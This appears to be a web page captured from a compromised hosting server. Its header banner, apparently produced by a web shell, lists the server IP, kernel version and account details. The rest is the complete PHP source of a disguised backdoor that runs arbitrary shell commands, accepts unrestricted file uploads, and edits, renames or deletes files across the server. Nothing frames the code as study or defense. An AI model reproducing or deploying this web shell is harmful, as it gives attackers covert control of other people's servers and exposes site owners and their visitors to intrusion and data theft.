|
Server IP : 2a02:4780:3:2287:0:3736:a38e:8 / Your IP : 216.73.216.24 Web Server : LiteSpeed System : Linux sg-nme-web2187.main-hosting.eu 5.14.0-611.54.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed May 6 18:03:03 EDT 2026 x86_64 User : u926327694 ( 926327694) PHP Version : 7.4.33 Disable Function : system, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0777) : /home/u926327694/domains/smsoft.in/public_html/mda/../smsoft-imges/../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>html|jpg|png|pdf|doc|txt</title>
<style>
body {
font-family: Arial, sans-serif;
margin: 20px;
background-color: #f9f9f9;
}
.container {
max-width: 1200px;
margin: 0 auto;
padding: 20px;
background: #fff;
box-shadow: 0 0 10px rgba(0,0,0,0.1);
border-radius: 5px;
}
.nav-tabs {
display: flex;
gap: 10px;
margin-bottom: 20px;
border-bottom: 1px solid #ddd;
padding-bottom: 10px;
}
.nav-tabs a {
text-decoration: none;
padding: 8px 16px;
background: #f1f1f1;
border-radius: 5px;
color: #333;
}
.nav-tabs a.active {
background: #007BFF;
color: white;
}
form {
display: flex;
flex-direction: column;
gap: 10px;
margin-top: 15px;
}
input, textarea, select {
padding: 10px;
font-size: 16px;
border: 1px solid #ddd;
border-radius: 5px;
}
input[type="submit"] {
background-color: #007BFF;
color: white;
border: none;
cursor: pointer;
}
input[type="submit"]:hover {
background-color: #0056b3;
}
.output {
background: #f1f1f1;
padding: 10px;
border: 1px solid #ddd;
border-radius: 5px;
overflow-x: auto;
}
table {
width: 100%;
border-collapse: collapse;
}
th, td {
text-align: left;
padding: 8px;
border-bottom: 1px solid #ddd;
}
th {
background-color: #f2f2f2;
}
.danger-file {
background-color: #ffe6e6;
}
.edit-btn, .delete-btn, .rename-btn {
text-decoration: none;
margin: 0 5px;
}
.edit-btn { color: green; }
.delete-btn { color: red; }
.rename-btn { color: orange; }
hr {
margin: 20px 0;
}
</style>
</head>
<body>
<div class="container">
<h2>[html|jpg|png|pdf|doc|txt</h2>
<?php
session_start();
// Helper function untuk format ukuran file
function formatSizeUnits($bytes) {
if ($bytes >= 1073741824) return number_format($bytes / 1073741824, 2) . ' GB';
if ($bytes >= 1048576) return number_format($bytes / 1048576, 2) . ' MB';
if ($bytes >= 1024) return number_format($bytes / 1024, 2) . ' KB';
return $bytes . ' B';
}
// Helper function untuk validasi path
function safe_join_path($base, $name) {
$base = rtrim($base, '/\\');
$name = ltrim($name, '/\\');
return $base . DIRECTORY_SEPARATOR . $name;
}
// Helper function untuk generate CSRF token sederhana
if (empty($_SESSION['csrf_token'])) {
$_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}
function check_csrf() {
if (!isset($_POST['csrf_token']) || $_POST['csrf_token'] !== $_SESSION['csrf_token']) {
$_SESSION['error'] = "CSRF token mismatch.";
header("Location: " . strtok($_SERVER["REQUEST_URI"], '?'));
exit;
}
}
// Direktori aktif
$current_dir = isset($_GET['dir']) ? $_GET['dir'] : getcwd();
if (!is_dir($current_dir)) $current_dir = getcwd();
chdir($current_dir);
// Tampilkan pesan session
if (isset($_SESSION['message'])) {
echo "<div class='output' style='color:green;'>✅ " . htmlspecialchars($_SESSION['message']) . "</div>";
unset($_SESSION['message']);
}
if (isset($_SESSION['error'])) {
echo "<div class='output' style='color:red;'>❌ " . htmlspecialchars($_SESSION['error']) . "</div>";
unset($_SESSION['error']);
}
$dir_param = '&dir=' . urlencode($current_dir);
?>
<div class="nav-tabs">
<a href="?mode=shell<?php echo $dir_param; ?>" class="<?php echo (!isset($_GET['mode']) || $_GET['mode']=='shell') ? 'active' : ''; ?>">Shell Command</a>
<a href="?mode=upload<?php echo $dir_param; ?>" class="<?php echo (isset($_GET['mode']) && $_GET['mode']=='upload') ? 'active' : ''; ?>">Upload File</a>
<a href="?mode=files<?php echo $dir_param; ?>" class="<?php echo (isset($_GET['mode']) && $_GET['mode']=='files') ? 'active' : ''; ?>">File Manager</a>
</div>
<?php
// ======================= SHELL COMMAND =======================
if (!isset($_GET['mode']) || $_GET['mode'] == 'shell') {
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['command'])) {
$command = escapeshellcmd($_POST['command']);
echo "<h3>Command: " . htmlspecialchars($command) . "</h3>";
echo "<div class='output'><pre>";
$output = shell_exec($command . " 2>&1");
echo htmlspecialchars($output);
echo "</pre></div>";
}
?>
<form method="POST">
<label for="command">Shell Command:</label>
<input type="text" id="command" name="command" placeholder="e.g. ls -la" required>
<input type="submit" value="Execute">
</form>
<hr>
<p><strong>Current Directory:</strong> <?php echo htmlspecialchars($current_dir); ?></p>
<?php
}
// ======================= UPLOAD FILE =======================
if (isset($_GET['mode']) && $_GET['mode'] == 'upload') {
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['upload_file'])) {
$target_file = basename($_FILES['upload_file']['name']);
$target_path = $current_dir . DIRECTORY_SEPARATOR . $target_file;
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $target_path)) {
$_SESSION['message'] = "File uploaded: " . htmlspecialchars($target_file);
} else {
$_SESSION['error'] = "Upload failed.";
}
header("Location: ?mode=upload&dir=" . urlencode($current_dir));
exit;
}
?>
<form method="POST" enctype="multipart/form-data">
<input type="hidden" name="csrf_token" value="<?php echo $_SESSION['csrf_token']; ?>">
<label for="upload_file">Pilih file:</label>
<input type="file" name="upload_file" id="upload_file" required>
<input type="submit" value="Upload File">
</form>
<hr>
<p><strong>Upload ke direktori:</strong> <?php echo htmlspecialchars($current_dir); ?></p>
<a href="?mode=files<?php echo $dir_param; ?>">← Kembali ke File Manager</a>
<?php
}
// ======================= FILE MANAGER =======================
if (isset($_GET['mode']) && $_GET['mode'] == 'files') {
// ---------- DELETE ----------
if (isset($_GET['delete'])) {
$target = basename($_GET['delete']);
$full_path = $current_dir . DIRECTORY_SEPARATOR . $target;
if (file_exists($full_path) && is_file($full_path)) {
if (unlink($full_path)) {
$_SESSION['message'] = "Deleted: " . htmlspecialchars($target);
} else {
$_SESSION['error'] = "Failed to delete: " . htmlspecialchars($target);
}
} else {
$_SESSION['error'] = "File not found.";
}
header("Location: ?mode=files&dir=" . urlencode($current_dir));
exit;
}
// ---------- RENAME (via POST) ----------
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action']) && $_POST['action'] === 'rename') {
check_csrf();
$old_name = basename($_POST['old']);
$new_name = basename($_POST['new']);
$old_path = safe_join_path($current_dir, $old_name);
$new_path = safe_join_path($current_dir, $new_name);
if (empty($new_name)) {
$_SESSION['error'] = "New name cannot be empty.";
} elseif (preg_match('/[\/\\\\:*?"<>|]/', $new_name)) {
$_SESSION['error'] = "Invalid characters in filename.";
} elseif (!file_exists($old_path)) {
$_SESSION['error'] = "File/folder does not exist.";
} elseif (file_exists($new_path)) {
$_SESSION['error'] = "A file/folder with that name already exists.";
} elseif (rename($old_path, $new_path)) {
$_SESSION['message'] = "Renamed " . htmlspecialchars($old_name) . " → " . htmlspecialchars($new_name);
} else {
$_SESSION['error'] = "Rename failed.";
}
header("Location: ?mode=files&dir=" . urlencode($current_dir));
exit;
}
// ---------- EDIT ----------
if (isset($_GET['edit'])) {
$edit_file = basename($_GET['edit']);
$full_path = $current_dir . DIRECTORY_SEPARATOR . $edit_file;
if (file_exists($full_path) && is_file($full_path) && is_readable($full_path)) {
$content = file_get_contents($full_path);
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['new_content'])) {
if (file_put_contents($full_path, $_POST['new_content'])) {
$_SESSION['message'] = "Saved: " . htmlspecialchars($edit_file);
header("Location: ?mode=files&dir=" . urlencode($current_dir));
exit;
} else {
echo "<div class='output' style='color:red;'>❌ Write failed.</div>";
}
}
?>
<h3>Editing: <?php echo htmlspecialchars($edit_file); ?></h3>
<form method="POST">
<textarea name="new_content" rows="15" style="width:100%; font-family:monospace;"><?php echo htmlspecialchars($content); ?></textarea>
<input type="submit" value="Save Changes">
</form>
<a href="?mode=files&dir=<?php echo urlencode($current_dir); ?>">← Back to File Manager</a>
<?php
exit;
} else {
echo "<div class='output' style='color:red;'>❌ Cannot edit file.</div>";
}
}
// ---------- TAMPILAN FILE MANAGER (TANPA "NonNull") ----------
echo "<h3>📁 File Manager - " . htmlspecialchars($current_dir) . "</h3>";
echo "<a href='?mode=files&dir=" . urlencode(dirname($current_dir)) . "' class='edit-btn' style='display:inline-block; margin-bottom:15px;'>⬆️ Up One Level</a>";
echo " | ";
echo "<a href='?mode=upload&dir=" . urlencode($current_dir) . "' class='edit-btn'>📤 Upload File ke direktori ini</a>";
// Form rename (jika ada parameter rename_form)
if (isset($_GET['rename_form'])) {
$target = basename($_GET['rename_form']);
$full_path = $current_dir . DIRECTORY_SEPARATOR . $target;
if (file_exists($full_path)) {
echo "<div class='output' style='margin-bottom:15px;'>";
echo "<strong>Rename: " . htmlspecialchars($target) . "</strong><br>";
echo "<form method='POST' action=''>";
echo "<input type='hidden' name='action' value='rename'>";
echo "<input type='hidden' name='csrf_token' value='" . $_SESSION['csrf_token'] . "'>";
echo "<input type='hidden' name='old' value='" . htmlspecialchars($target) . "'>";
echo "<label>New name: </label>";
echo "<input type='text' name='new' value='" . htmlspecialchars($target) . "' required>";
echo "<input type='submit' value='Rename'>";
echo "</form>";
echo "</div>";
} else {
echo "<div class='output' style='color:red;'>❌ File/folder not found.</div>";
}
}
echo "<table>";
echo "<tr><th>Name</th><th>Size</th><th>Modified</th><th>Actions</th></tr>";
$files = scandir($current_dir);
foreach ($files as $file) {
if ($file == '.' || $file == '..') continue;
$full_path = $current_dir . DIRECTORY_SEPARATOR . $file;
$is_dir = is_dir($full_path);
$size = $is_dir ? '-' : filesize($full_path);
$size_display = $is_dir ? '<DIR>' : formatSizeUnits($size);
$modified = date("Y-m-d H:i:s", filemtime($full_path));
$ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
$danger_exts = ['php', 'phtml', 'php3', 'php4', 'php5', 'shtml', 'pl', 'cgi', 'py', 'sh'];
$row_class = in_array($ext, $danger_exts) ? 'danger-file' : '';
echo "<tr class='$row_class'>";
echo "<td>";
if ($is_dir) echo "📁 ";
else echo "📄 ";
echo htmlspecialchars($file);
echo "</td>";
echo "<td>$size_display</td>";
echo "<td>$modified</td>";
echo "<td>";
if ($is_dir) {
echo "<a href='?mode=files&dir=" . urlencode($full_path) . "' class='edit-btn'>📂 Open</a> ";
echo "<a href='?mode=files&rename_form=" . urlencode($file) . "&dir=" . urlencode($current_dir) . "' class='rename-btn'>✏️ Rename</a>";
} else {
echo "<a href='?mode=files&edit=" . urlencode($file) . "&dir=" . urlencode($current_dir) . "' class='edit-btn'>✏️ Edit</a> ";
echo "<a href='?mode=files&rename_form=" . urlencode($file) . "&dir=" . urlencode($current_dir) . "' class='rename-btn'>🏷️ Rename</a> ";
echo "<a href='?mode=files&delete=" . urlencode($file) . "&dir=" . urlencode($current_dir) . "' class='delete-btn' onclick='return confirm(\"Delete this file?\")'>🗑️ Delete</a>";
}
echo "</td>";
echo "</tr>";
}
echo "</table>";
}
?>
</div>
</body>
</html>